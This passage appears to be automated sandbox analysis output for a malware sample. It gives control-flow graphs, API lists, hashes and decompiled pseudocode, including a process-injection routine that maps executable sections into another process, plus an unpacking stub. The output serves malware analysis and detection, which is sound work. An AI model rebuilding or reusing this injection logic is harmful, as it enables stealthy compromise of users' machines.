                    control_flow_graph 202 401460-401482 call 401134 206 401484 202->206 207 401487-40148c 202->207 206->207 209 4017b2-4017ba 207->209 210 401492-4014a3 207->210 209->207 213 4017b0-4017d3 210->213 214 4014a9-4014d2 210->214 222 4017e5 213->222 214->213 221 4014d8-4014ef NtDuplicateObject 214->221 221->213 223 4014f5-401519 NtCreateSection 221->223 225 401575-40159b NtCreateSection 223->225 226 40151b-40153c NtMapViewOfSection 223->226 225->213 230 4015a1-4015a5 225->230 226->225 228 40153e-40155a NtMapViewOfSection 226->228 228->225 231 40155c-401572 228->231 230->213 232 4015ab-4015cc NtMapViewOfSection 230->232 231->225 232->213 233 4015d2-4015ee NtMapViewOfSection 232->233 233->213 235 4015f4 call 4015f9 233->235
                    C-Code - Quality: 59%
                    			E00401460(signed int __eax, void* __edi) {
                    				intOrPtr _t88;
                    				long _t91;
                    				void* _t92;
                    				struct _GUID _t99;
                    				struct _GUID _t101;
                    				PVOID* _t103;
                    				PVOID* _t105;
                    				intOrPtr* _t109;
                    				PVOID* _t121;
                    				PVOID* _t123;
                    				intOrPtr _t127;
                    				long* _t132;
                    				signed int _t139;
                    				int _t140;
                    				intOrPtr _t157;
                    				void* _t162;
                    				intOrPtr* _t163;
                    				void* _t166;
                    				long _t174;
                    				intOrPtr _t176;
                    				void* _t177;
                    				long* _t182;
                    				intOrPtr* _t184;
                    				HANDLE* _t185;
                    				HANDLE* _t186;
                    				void* _t191;
                    				void* _t192;
                    				intOrPtr* _t195;
                    				void* _t196;
                    				void* _t199;
                    				void* _t200;
                    				void* _t202;
                    				void* _t204;
                    				intOrPtr* _t205;
                    				signed char _t209;
                    				long _t223;
                    				void* _t229;
                    
                    				_t85 = __eax | 0x00000076;
                    				_t209 = __eax | 0x00000076;
                    				E00401134(_t85, __edi, _t209, _t229);
                    				_t127 =  *((intOrPtr*)(_t200 + 8));
                    				_t174 = 0;
                    				 *((intOrPtr*)(_t200 - 0x34)) = 0;
                    				if(gs != 0) {
                    					 *((intOrPtr*)(_t200 - 0x34)) =  *((intOrPtr*)(_t200 - 0x34)) + 1;
                    				}
                    				while(1) {
                    					_t88 =  *((intOrPtr*)(_t127 + 0x48))();
                    					if(_t88 != 0) {
                    						break;
                    					}
                    					 *((intOrPtr*)(_t127 + 0x1c))(0x3e8);
                    				}
                    				 *((intOrPtr*)(_t200 - 0x5c)) = _t88;
                    				_t182 = _t200 - 0x60;
                    				 *_t182 = _t174;
                    				 *((intOrPtr*)(_t127 + 0x4c))(_t88, _t182);
                    				_t91 =  *_t182;
                    				if(_t91 != 0) {
                    					_t132 = _t200 - 0x30;
                    					 *_t132 = _t91;
                    					_t132[1] = _t174;
                    					_t184 = _t200 - 0x28;
                    					 *((intOrPtr*)(_t127 + 0x10))(_t184, 0x18);
                    					 *_t184 = 0x18;
                    					_push(_t200 - 0x30);
                    					_push(_t184);
                    					_push(0x40);
                    					_push(_t200 - 0x10);
                    					if( *((intOrPtr*)(_t127 + 0x70))() == 0 && NtDuplicateObject( *(_t200 - 0x10), 0xffffffff, 0xffffffff, _t200 - 0xc, _t174, _t174, 2) == 0) {
                    						 *(_t200 - 8) = _t174;
                    						_t99 = _t200 - 0x50;
                    						 *(_t99 + 4) = _t174;
                    						 *_t99 = 0x5000;
                    						_t185 = _t200 - 0x54;
                    						if(NtCreateSection(_t185, 6, _t174, _t99, 4, 0x8000000, _t174) == 0) {
                    							 *_t25 =  *(_t200 - 0x50);
                    							_t121 = _t200 - 0x44;
                    							 *_t121 = _t174;
                    							if(NtMapViewOfSection( *_t185, 0xffffffff, _t121, _t174, _t174, _t174, _t200 - 0x38, 1, _t174, 4) == 0) {
                    								_t123 = _t200 - 0x3c;
                    								 *_t123 = _t174;
                    								if(NtMapViewOfSection( *_t185,  *(_t200 - 0xc), _t123, _t174, _t174, _t174, _t200 - 0x38, 1, _t174, 4) == 0) {
                    									_t199 =  *(_t200 - 0x44);
                    									 *((intOrPtr*)(_t127 + 0x20))(_t174, _t199, 0x104);
                    									 *((intOrPtr*)(_t199 + 0x208)) =  *((intOrPtr*)(_t200 + 0x14));
                    									 *(_t200 - 8) =  *(_t200 - 8) + 1;
                    								}
                    							}
                    						}
                    						_t101 = _t200 - 0x50;
                    						 *(_t101 + 4) = _t174;
                    						 *_t101 =  *((intOrPtr*)(_t200 + 0x10)) + 0x10000;
                    						_t186 = _t200 - 0x58;
                    						if(NtCreateSection(_t186, 0xe, _t174, _t101, 0x40, 0x8000000, _t174) == 0 &&  *(_t200 - 8) != 0) {
                    							 *_t46 =  *(_t200 - 0x50);
                    							_t103 = _t200 - 0x48;
                    							 *_t103 = _t174;
                    							if(NtMapViewOfSection( *_t186, 0xffffffff, _t103, _t174, _t174, _t174, _t200 - 0x38, 1, _t174, 4) == 0) {
                    								_t105 = _t200 - 0x40;
                    								 *_t105 = _t174;
                    								_t223 = NtMapViewOfSection( *_t186,  *(_t200 - 0xc), _t105, _t174, _t174, _t174, _t200 - 0x38, 1, _t174, 0x20);
                    								if(_t223 == 0) {
                    									L17();
                    									if(_t223 == 0 && _t223 != 0) {
                    										asm("xlatb");
                    										asm("rcl dword [ebx], 0x8b");
                    									}
                    									_t204 = _t202 + 4;
                    									_push(0x2eb0);
                    									_t205 = _t204 + 4;
                    									_push(0x2260);
                    									_t157 =  *_t205;
                    									_push(_t157);
                    									asm("lodsb");
                    									asm("loop 0xffffffc9");
                    									_t191 =  *((intOrPtr*)(_t200 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t200 + 0xc))));
                    									_t139 =  *(_t191 + 6) & 0x0000ffff;
                    									_push(_t191);
                    									_t162 = _t191;
                    									if( *((intOrPtr*)(_t200 - 0x34)) == 0) {
                    										_t163 = _t162 + 0xf8;
                    										__eflags = _t163;
                    									} else {
                    										_t163 = _t162 + 0x108;
                    									}
                    									_push(_t139);
                    									_t140 =  *(_t163 + 0x10);
                    									if(_t140 != 0) {
                    										memcpy( *((intOrPtr*)(_t163 + 0xc)) +  *(_t200 - 0x48),  *((intOrPtr*)(_t163 + 0x14)) +  *((intOrPtr*)(_t200 + 0xc)), _t140);
                    									}
                    									asm("loop 0xffffffe6");
                    									_pop(_t192);
                    									if( *((intOrPtr*)(_t200 - 0x34)) == 0) {
                    										_push(_t192);
                    										_t166 =  *((intOrPtr*)(_t192 + 0x34)) -  *(_t200 - 0x40);
                    										_t195 =  *((intOrPtr*)(_t192 + 0xa0)) +  *(_t200 - 0x48);
                    										__eflags = _t195;
                    										while(1) {
                    											__eflags =  *_t195;
                    											if( *_t195 == 0) {
                    												break;
                    											}
                    											_t176 =  *_t195;
                    											_t195 = _t195 + 8;
                    											asm("lodsw");
                    											__eflags = 0;
                    											if(0 != 0) {
                    												 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) - _t166;
                    												__eflags =  *((intOrPtr*)(0 +  *(_t200 - 0x48) + _t176));
                    											}
                    											asm("loop 0xffffffe9");
                    										}
                    										_pop(_t196);
                    										_t174 = 0;
                    										__eflags = 0;
                    										_t109 = _t200 - 4;
                    										 *_t109 = 0;
                    										 *((intOrPtr*)(_t127 + 0x98))( *(_t200 - 0xc), 0, 0, 0, 0, 0,  *((intOrPtr*)(_t196 + 0x28)) +  *(_t200 - 0x40),  *(_t200 - 0x3c), _t109, 0);
                    									} else {
                    										L50();
                    										_pop(_t177);
                    										_t174 = _t177 - 0x16ee;
                    										 *((intOrPtr*)(_t174 + 0x1722)) = _t174 + 0x2bbb;
                    										L004011C3();
                    										0x33(_t174 + 0x2bbb, 0x1ad);
                    										 *((intOrPtr*)(_t174 + 0x1747)) = _t174 + 0x2c0b;
                    										0x33();
                    									}
                    								}
                    							}
                    						}
                    					}
                    				}
                    				_t92 = 0x1474;
                    				_push(0x379);
                    			}

                    APIs
                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004014E7
                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401514
                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401537
                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401555
                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401596
                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015C7
                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004015E9
                    Memory Dump Source
                    • Source File: 00000002.00000002.430871790.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_ichffhi.jbxd
                    Similarity
                    • API ID: Section$View$Create$DuplicateObject
                    • String ID:
                    • API String ID: 1546783058-0
                    • Opcode ID: 6009193819dd22e85f5db9aefac48bd8857ccca130184f1ff84ad04c18ecb97b
                    • Instruction ID: 0eb640bdefb12f4d8d79d21e94fd48f192c5c8138051fc39ed52ff1756291963
                    • Opcode Fuzzy Hash: 6009193819dd22e85f5db9aefac48bd8857ccca130184f1ff84ad04c18ecb97b
                    • Instruction Fuzzy Hash: 5D511A75900249BFEF208F91CC89FEF7BB8EF85710F104159FA11AA2A5D7709944CB24
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 237 40146b-401482 call 401134 243 401484 237->243 244 401487-40148c 237->244 243->244 246 4017b2-4017ba 244->246 247 401492-4014a3 244->247 246->244 250 4017b0-4017d3 247->250 251 4014a9-4014d2 247->251 259 4017e5 250->259 251->250 258 4014d8-4014ef NtDuplicateObject 251->258 258->250 260 4014f5-401519 NtCreateSection 258->260 262 401575-40159b NtCreateSection 260->262 263 40151b-40153c NtMapViewOfSection 260->263 262->250 267 4015a1-4015a5 262->267 263->262 265 40153e-40155a NtMapViewOfSection 263->265 265->262 268 40155c-401572 265->268 267->250 269 4015ab-4015cc NtMapViewOfSection 267->269 268->262 269->250 270 4015d2-4015ee NtMapViewOfSection 269->270 270->250 272 4015f4 call 4015f9 270->272
                    C-Code - Quality: 57%
                    			E0040146B(void* __edi, void* __eflags) {
                    				void* _t84;
                    				intOrPtr _t87;
                    				long _t90;
                    				void* _t91;
                    				struct _GUID _t98;
                    				struct _GUID _t100;
                    				PVOID* _t102;
                    				PVOID* _t104;
                    				intOrPtr* _t108;
                    				PVOID* _t120;
                    				PVOID* _t122;
                    				intOrPtr _t126;
                    				long* _t130;
                    				signed int _t137;
                    				int _t138;
                    				intOrPtr _t155;
                    				void* _t160;
                    				intOrPtr* _t161;
                    				void* _t164;
                    				long _t172;
                    				intOrPtr _t174;
                    				void* _t175;
                    				long* _t180;
                    				intOrPtr* _t182;
                    				HANDLE* _t183;
                    				HANDLE* _t184;
                    				void* _t189;
                    				void* _t190;
                    				intOrPtr* _t193;
                    				void* _t194;
                    				void* _t197;
                    				void* _t198;
                    				void* _t200;
                    				void* _t202;
                    				intOrPtr* _t203;
                    				long _t221;
                    				void* _t227;
                    
                    				asm("pushfd");
                    				E00401134(_t84, __edi, __eflags, _t227);
                    				_t126 =  *((intOrPtr*)(_t198 + 8));
                    				_t172 = 0;
                    				 *((intOrPtr*)(_t198 - 0x34)) = 0;
                    				if(gs != 0) {
                    					 *((intOrPtr*)(_t198 - 0x34)) =  *((intOrPtr*)(_t198 - 0x34)) + 1;
                    				}
                    				while(1) {
                    					_t87 =  *((intOrPtr*)(_t126 + 0x48))();
                    					if(_t87 != 0) {
                    						break;
                    					}
                    					 *((intOrPtr*)(_t126 + 0x1c))(0x3e8);
                    				}
                    				 *((intOrPtr*)(_t198 - 0x5c)) = _t87;
                    				_t180 = _t198 - 0x60;
                    				 *_t180 = _t172;
                    				 *((intOrPtr*)(_t126 + 0x4c))(_t87, _t180);
                    				_t90 =  *_t180;
                    				if(_t90 != 0) {
                    					_t130 = _t198 - 0x30;
                    					 *_t130 = _t90;
                    					_t130[1] = _t172;
                    					_t182 = _t198 - 0x28;
                    					 *((intOrPtr*)(_t126 + 0x10))(_t182, 0x18);
                    					 *_t182 = 0x18;
                    					_push(_t198 - 0x30);
                    					_push(_t182);
                    					_push(0x40);
                    					_push(_t198 - 0x10);
                    					if( *((intOrPtr*)(_t126 + 0x70))() == 0 && NtDuplicateObject( *(_t198 - 0x10), 0xffffffff, 0xffffffff, _t198 - 0xc, _t172, _t172, 2) == 0) {
                    						 *(_t198 - 8) = _t172;
                    						_t98 = _t198 - 0x50;
                    						 *(_t98 + 4) = _t172;
                    						 *_t98 = 0x5000;
                    						_t183 = _t198 - 0x54;
                    						if(NtCreateSection(_t183, 6, _t172, _t98, 4, 0x8000000, _t172) == 0) {
                    							 *_t25 =  *(_t198 - 0x50);
                    							_t120 = _t198 - 0x44;
                    							 *_t120 = _t172;
                    							if(NtMapViewOfSection( *_t183, 0xffffffff, _t120, _t172, _t172, _t172, _t198 - 0x38, 1, _t172, 4) == 0) {
                    								_t122 = _t198 - 0x3c;
                    								 *_t122 = _t172;
                    								if(NtMapViewOfSection( *_t183,  *(_t198 - 0xc), _t122, _t172, _t172, _t172, _t198 - 0x38, 1, _t172, 4) == 0) {
                    									_t197 =  *(_t198 - 0x44);
                    									 *((intOrPtr*)(_t126 + 0x20))(_t172, _t197, 0x104);
                    									 *((intOrPtr*)(_t197 + 0x208)) =  *((intOrPtr*)(_t198 + 0x14));
                    									 *(_t198 - 8) =  *(_t198 - 8) + 1;
                    								}
                    							}
                    						}
                    						_t100 = _t198 - 0x50;
                    						 *(_t100 + 4) = _t172;
                    						 *_t100 =  *((intOrPtr*)(_t198 + 0x10)) + 0x10000;
                    						_t184 = _t198 - 0x58;
                    						if(NtCreateSection(_t184, 0xe, _t172, _t100, 0x40, 0x8000000, _t172) == 0 &&  *(_t198 - 8) != 0) {
                    							 *_t46 =  *(_t198 - 0x50);
                    							_t102 = _t198 - 0x48;
                    							 *_t102 = _t172;
                    							if(NtMapViewOfSection( *_t184, 0xffffffff, _t102, _t172, _t172, _t172, _t198 - 0x38, 1, _t172, 4) == 0) {
                    								_t104 = _t198 - 0x40;
                    								 *_t104 = _t172;
                    								_t221 = NtMapViewOfSection( *_t184,  *(_t198 - 0xc), _t104, _t172, _t172, _t172, _t198 - 0x38, 1, _t172, 0x20);
                    								if(_t221 == 0) {
                    									L18();
                    									if(_t221 == 0 && _t221 != 0) {
                    										asm("xlatb");
                    										asm("rcl dword [ebx], 0x8b");
                    									}
                    									_t202 = _t200 + 4;
                    									_push(0x2eb0);
                    									_t203 = _t202 + 4;
                    									_push(0x2260);
                    									_t155 =  *_t203;
                    									_push(_t155);
                    									asm("lodsb");
                    									asm("loop 0xffffffc9");
                    									_t189 =  *((intOrPtr*)(_t198 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t198 + 0xc))));
                    									_t137 =  *(_t189 + 6) & 0x0000ffff;
                    									_push(_t189);
                    									_t160 = _t189;
                    									if( *((intOrPtr*)(_t198 - 0x34)) == 0) {
                    										_t161 = _t160 + 0xf8;
                    										__eflags = _t161;
                    									} else {
                    										_t161 = _t160 + 0x108;
                    									}
                    									_push(_t137);
                    									_t138 =  *(_t161 + 0x10);
                    									if(_t138 != 0) {
                    										memcpy( *((intOrPtr*)(_t161 + 0xc)) +  *(_t198 - 0x48),  *((intOrPtr*)(_t161 + 0x14)) +  *((intOrPtr*)(_t198 + 0xc)), _t138);
                    									}
                    									asm("loop 0xffffffe6");
                    									_pop(_t190);
                    									if( *((intOrPtr*)(_t198 - 0x34)) == 0) {
                    										_push(_t190);
                    										_t164 =  *((intOrPtr*)(_t190 + 0x34)) -  *(_t198 - 0x40);
                    										_t193 =  *((intOrPtr*)(_t190 + 0xa0)) +  *(_t198 - 0x48);
                    										__eflags = _t193;
                    										while(1) {
                    											__eflags =  *_t193;
                    											if( *_t193 == 0) {
                    												break;
                    											}
                    											_t174 =  *_t193;
                    											_t193 = _t193 + 8;
                    											asm("lodsw");
                    											__eflags = 0;
                    											if(0 != 0) {
                    												 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) - _t164;
                    												__eflags =  *((intOrPtr*)(0 +  *(_t198 - 0x48) + _t174));
                    											}
                    											asm("loop 0xffffffe9");
                    										}
                    										_pop(_t194);
                    										_t172 = 0;
                    										__eflags = 0;
                    										_t108 = _t198 - 4;
                    										 *_t108 = 0;
                    										 *((intOrPtr*)(_t126 + 0x98))( *(_t198 - 0xc), 0, 0, 0, 0, 0,  *((intOrPtr*)(_t194 + 0x28)) +  *(_t198 - 0x40),  *(_t198 - 0x3c), _t108, 0);
                    									} else {
                    										L51();
                    										_pop(_t175);
                    										_t172 = _t175 - 0x16ee;
                    										 *((intOrPtr*)(_t172 + 0x1722)) = _t172 + 0x2bbb;
                    										L004011C3();
                    										0x33(_t172 + 0x2bbb, 0x1ad);
                    										 *((intOrPtr*)(_t172 + 0x1747)) = _t172 + 0x2c0b;
                    										0x33();
                    									}
                    								}
                    							}
                    						}
                    					}
                    				}
                    				_t91 = 0x1474;
                    				_push(0x379);
                    			}

                    APIs
                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004014E7
                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401514
                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401537
                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401555
                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401596
                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015C7
                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004015E9
                    Memory Dump Source
                    • Source File: 00000002.00000002.430871790.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_ichffhi.jbxd
                    Similarity
                    • API ID: Section$View$Create$DuplicateObject
                    • String ID:
                    • API String ID: 1546783058-0
                    • Opcode ID: 35e92747d0d6b9a951735621b21a4a40d652c97b84ba7f77340fa48fb621f182
                    • Instruction ID: 89e6db08217f17037b3c9ea992626000aec066f246d799dfcc25d33cb0bbcea7
                    • Opcode Fuzzy Hash: 35e92747d0d6b9a951735621b21a4a40d652c97b84ba7f77340fa48fb621f182
                    • Instruction Fuzzy Hash: 0151FAB5900249BFEB208F91CC89FAF7BB8EF85710F104159FA11AA2A5D7749945CB24
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 0 53003c-530047 1 530049 0->1 2 53004c-530263 call 530a3f call 530e0f call 530d90 VirtualAlloc 0->2 1->2 17 530265-530289 call 530a69 2->17 18 53028b-530292 2->18 23 5302ce-5303c2 VirtualProtect call 530cce call 530ce7 17->23 20 5302a1-5302b0 18->20 22 5302b2-5302cc 20->22 20->23 22->20 29 5303d1-5303e0 23->29 30 5303e2-530437 call 530ce7 29->30 31 530439-5304b8 VirtualFree 29->31 30->29 33 5305f4-5305fe 31->33 34 5304be-5304cd 31->34 37 530604-53060d 33->37 38 53077f-530789 33->38 36 5304d3-5304dd 34->36 36->33 40 5304e3-530505 36->40 37->38 43 530613-530637 37->43 41 5307a6-5307b0 38->41 42 53078b-5307a3 38->42 51 530517-530520 40->51 52 530507-530515 40->52 44 5307b6-5307cb 41->44 45 53086e-5308be LoadLibraryA 41->45 42->41 46 53063e-530648 43->46 48 5307d2-5307d5 44->48 50 5308c7-5308f9 45->50 46->38 49 53064e-53065a 46->49 53 5307d7-5307e0 48->53 54 530824-530833 48->54 49->38 55 530660-53066a 49->55 57 530902-53091d 50->57 58 5308fb-530901 50->58 59 530526-530547 51->59 52->59 60 5307e2 53->60 61 5307e4-530822 53->61 56 530839-53083c 54->56 62 53067a-530689 55->62 56->45 63 53083e-530847 56->63 58->57 66 53054d-530550 59->66 60->54 61->48 64 530750-53077a 62->64 65 53068f-5306b2 62->65 67 53084b-53086c 63->67 68 530849 63->68 64->46 69 5306b4-5306ed 65->69 70 5306ef-5306fc 65->70 72 5305e0-5305ef 66->72 73 530556-53056b 66->73 67->56 68->45 69->70 74 53074b 70->74 75 5306fe-530748 70->75 72->36 76 53056f-53057a 73->76 77 53056d 73->77 74->62 75->74 78 53059b-5305bb 76->78 79 53057c-530599 76->79 77->72 84 5305bd-5305db 78->84 79->84 84->66
                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0053024D
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.431007198.0000000000530000.00000040.00001000.00020000.00000000.sdmp, Offset: 00530000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_530000_ichffhi.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocVirtual
                    • String ID: cess$kernel32.dll
                    • API String ID: 4275171209-1230238691
                    • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                    • Instruction ID: dbbae28743631155f3db6bb32cb2d02d0cd49f0ed6f47c960f984cfc88bdb838
                    • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                    • Instruction Fuzzy Hash: 7C526874A01229DFDB64CF58C995BA8BBB1BF09304F1480D9E90DAB391DB30AE95DF14
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 274 40c96a-40c983 call 4105f7 277 40c985-40c988 274->277 278 40c99d-40c9a1 274->278 281 40ca2d-40ca2f 277->281 279 40c9a3-40c9b8 call 41065a 278->279 280 40c98d-40c98f 278->280 279->277 287 40c9ba-40c9c1 279->287 283 40c991 280->283 284 40c992-40c999 280->284 283->284 284->278 288 40ca05-40ca08 287->288 289 40c9c3-40c9d0 288->289 290 40ca0a-40ca29 288->290 294 40c9d2-40c9d5 call 41065a 289->294 295 40ca03 289->295 293 40ca2b-40ca2c 290->293 293->281 297 40c9da-40c9e0 294->297 295->288 298 40ca30-40ca45 297->298 299 40c9e2-40c9ef 297->299 298->293 302 40ca00 299->302 303 40c9f1-40c9fd 299->303 302->295 303->302
                    APIs
                    • ___initmbctable.LIBCMT ref: 0040C972
                      • Part of subcall function 004105F7: __setmbcp.LIBCMT ref: 00410602
                    • __calloc_crt.LIBCMT ref: 0040C9A7
                    Memory Dump Source
                    • Source File: 00000002.00000002.430892447.0000000000409000.00000020.00000001.01000000.00000006.sdmp, Offset: 00409000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_409000_ichffhi.jbxd
                    Similarity
                    • API ID: ___initmbctable__calloc_crt__setmbcp
                    • String ID:
                    • API String ID: 4150745854-0
                    • Opcode ID: bbed12e89968c4f6c2cbb67d26b3dfc3fbc67c745ac89b501c6bab3494cf33b4
                    • Instruction ID: ba80878632f788adcc880e20e5c52df4f94d7748c8d254a861737b16b4d9621a
                    • Opcode Fuzzy Hash: bbed12e89968c4f6c2cbb67d26b3dfc3fbc67c745ac89b501c6bab3494cf33b4
                    • Instruction Fuzzy Hash: 8B210EB3904111AAEF2197366C85B5737849B41365F35033FF891722D1DA7D9882865D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 305 530e0f-530e24 SetErrorMode * 2 306 530e26 305->306 307 530e2b-530e2c 305->307 306->307
                    APIs
                    • SetErrorMode.KERNELBASE(00000400,?,?,00530223,?,?), ref: 00530E19
                    • SetErrorMode.KERNELBASE(00000000,?,?,00530223,?,?), ref: 00530E1E
                    Memory Dump Source
                    • Source File: 00000002.00000002.431007198.0000000000530000.00000040.00001000.00020000.00000000.sdmp, Offset: 00530000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_530000_ichffhi.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorMode
                    • String ID:
                    • API String ID: 2340568224-0
                    • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                    • Instruction ID: 744b544679e81edac46ace1a1040a10e47f9b2819e4d35e23ba8ce53e105023a
                    • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                    • Instruction Fuzzy Hash: BDD0123124522877D7003A94DC09BCD7F1CDF05B62F008411FB0DD9080C770994046E5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 308 40ce1f-40ce41 HeapCreate 309 40ce43-40ce44 308->309 310 40ce45-40ce4e 308->310
                    APIs
                    • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040CE34
                    Memory Dump Source
                    • Source File: 00000002.00000002.430892447.0000000000409000.00000020.00000001.01000000.00000006.sdmp, Offset: 00409000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_409000_ichffhi.jbxd
                    Similarity
                    • API ID: CreateHeap
                    • String ID:
                    • API String ID: 10892065-0
                    • Opcode ID: f58d1642b2d06b1893d901f714456932096660bd81b9c58e6896f47aa16a25e0
                    • Instruction ID: c4e98715908aa5aa5608ab1660a6e083fbb4bcb1d5e1bcca78ae5a112a13d87e
                    • Opcode Fuzzy Hash: f58d1642b2d06b1893d901f714456932096660bd81b9c58e6896f47aa16a25e0
                    • Instruction Fuzzy Hash: C4D0A7366543099FEB105F74BD087233BECD384395F004436B90CC61A0F574C941C648
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 311 4017f4-401817 315 401825 311->315 316 40181e-401821 311->316 315->316 317 401828-40184a call 401134 Sleep call 401366 315->317 316->317 322 401859-40185f 317->322 323 40184c-401854 call 40143b 317->323 326 401865-40188e call 401134 322->326 327 40186e 322->327 323->322 327->326
                    C-Code - Quality: 43%
                    			E004017F4(void* __edi, void* __esi, void* __eflags, void* __fp0, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                    				char _v8;
                    				void* __ebp;
                    				intOrPtr _t8;
                    				void* _t11;
                    				void* _t14;
                    				intOrPtr* _t16;
                    				void* _t19;
                    				intOrPtr* _t23;
                    
                    				_t27 = __fp0;
                    				_t25 = __eflags;
                    				_t20 = __edi;
                    				_push(__edi);
                    				_push(0x182d);
                    				_t8 =  *_t23;
                    				_push(0x5d);
                    				E00401134(_t8, __edi, __eflags, __fp0);
                    				_t16 = _a4;
                    				Sleep(0x1388);
                    				_t11 = L00401366(_t19, _t25, _t16, _a8, _a12,  &_v8); // executed
                    				_t26 = _t11;
                    				if(_t11 != 0) {
                    					E0040143B(_t26, _t16, _t11, _v8, _a16); // executed
                    				}
                    				 *_t16(0xffffffff, 0);
                    				_t14 = E00401134(0x182d, _t20, _t26, _t27);
                    				[far dword [edi+0x5e]();
                    				return _t14;
                    			}

                    APIs
                    • Sleep.KERNELBASE(00001388), ref: 00401835
                      • Part of subcall function 0040143B: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004014E7
                      • Part of subcall function 0040143B: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401514
                      • Part of subcall function 0040143B: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401537
                    Memory Dump Source
                    • Source File: 00000002.00000002.430871790.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_ichffhi.jbxd
                    Similarity
                    • API ID: Section$CreateDuplicateObjectSleepView
                    • String ID:
                    • API String ID: 1885482327-0
                    • Opcode ID: 4833809e19ebbce1afda95b8d958c6ac0413f9150f8c520dfd08e6e3e547968f
                    • Instruction ID: df28ea85591e98f8d733e92c0a85c910368ecf21aa371a8bf2e7d42b67981e89
                    • Opcode Fuzzy Hash: 4833809e19ebbce1afda95b8d958c6ac0413f9150f8c520dfd08e6e3e547968f
                    • Instruction Fuzzy Hash: 05014F77608204E7DB017AA59C41EAA366CAB45754F20C537FA13781F1D63CCB12ABAB
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 334 401824-401825 336 401828-40184a call 401134 Sleep call 401366 334->336 337 40181e-401821 334->337 342 401859-40185f 336->342 343 40184c-401854 call 40143b 336->343 337->336 346 401865-40188e call 401134 342->346 347 40186e 342->347 343->342 347->346
                    C-Code - Quality: 56%
                    			E00401824(void* __edi, void* __eflags, void* __fp0) {
                    				void* _t8;
                    				void* _t11;
                    				void* _t14;
                    				intOrPtr* _t16;
                    				void* _t20;
                    				void* _t22;
                    
                    				_t27 = __fp0;
                    				_t25 = __eflags;
                    				_t21 = __edi;
                    				_pop(_t8);
                    				_t22 = 0x5d;
                    				E00401134(_t8, __edi, __eflags, __fp0);
                    				_t16 =  *((intOrPtr*)(_t22 + 8));
                    				Sleep(0x1388);
